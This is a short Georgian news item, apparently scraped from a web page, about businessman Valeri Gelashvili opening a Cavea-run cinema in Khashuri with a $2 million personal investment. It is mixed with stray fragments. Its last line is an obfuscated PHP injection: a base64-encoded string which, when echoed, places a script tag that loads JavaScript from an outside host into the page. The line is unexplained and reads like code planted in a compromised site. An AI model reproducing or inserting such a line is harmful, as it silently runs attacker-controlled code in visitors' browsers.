celsiusi
ავერსი შნაიდერი

ბიზნესმენი ვალერი გელაშვილი Cavea cinemas-თან თანამშრომლობით, ხაშურში კინოთეატრს ახალი წლისთვის გახსნის. ამ ეტაპისთვის ორი დარბაზის მშენებლობა დასრულებულია და ახლა კინოთეატრის საჭირო ინვენტარით მოწყობა მიმდინარეობს.

როგორც ვალერი გელაშვილმა Bm.ge-ს განუცხადა, $2 მილიონის მოცულობის ინვესტიცია ბიზნესმენმა პირადი ფინანსებით განახორციელა, კინოთეატრის მართვას კი Cavea გაუძღვება.

„დარბაზები უკვე მზად არის და კინოთეატრი საჭირო ინვენტარის ჩამოსვლისთანავე, რომელიც "კავეას" შემოაქვს, გაიხსნება; დიდი სურვილი გვაქვს, ეს ახალი წლისთვის მოხდეს. ინვესტიცია პირადი ფინანსებით გნვახორციელე, Cavea-ს პასუხისმგებლობა კი კინოთეატრის მართვა იქნება“, - განმარტავს გელაშვილი.

ინფორმაციისთვის: ბიზნესმენის კომპანია „ლიტ ჯეო ინვესტი“ სურამში $5 მილიონის ინვესტიციით მრავალფუნქციურ კომპლექსაც აშენებს.

1124
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");